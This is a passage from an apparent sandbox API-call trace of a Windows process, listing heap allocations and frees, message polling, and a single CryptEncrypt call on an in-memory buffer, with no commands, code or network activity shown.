lpMsg=0x8cf3b8) returned 0 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0144.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0144.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.864] CharLowerBuffW (in: lpsz="byte[41848]", cchLength=0xb | out: lpsz="byte[41848]") returned 0xb [0144.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0144.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0144.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0144.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0144.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0144.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0144.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0144.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0144.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0144.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0144.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0144.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0144.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0144.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa378) returned 0x2f32a90 [0144.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0144.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0144.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0144.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0144.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0144.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0144.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0144.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0144.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0144.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0144.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0144.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0144.868] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0144.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa377) returned 0x2f3ce10 [0144.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0144.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa377) returned 0x2e80330 [0144.873] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0144.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0144.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0144.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0144.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0144.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0144.873] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0144.873] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0144.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0144.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0144.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0144.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0144.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0144.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0144.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0144.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e509f8 [0144.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0144.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0144.875] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0144.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0144.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0144.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54558 [0144.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0144.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0144.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0144.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0144.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0144.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0144.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0144.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0144.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0144.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0144.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0144.986] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f32a90*, pdwDataLen=0x8cef60*=0xa377, dwBufLen=0xa378 | out: pbData=0x2f32a90*, pdwDataLen=0x8cef60*=0xa378) returned 1 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0144.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0144.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0144.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0144.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0144.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0144.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0144.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0144.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0144.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0144.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0144.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0144.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0144.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0144.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0144.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0144.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0144.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0144.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0144.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0144.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0144.993] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0144.993] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0144.993] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0144.993] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0144.993] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0144.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0144.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0144.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0144.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0144.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0144.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 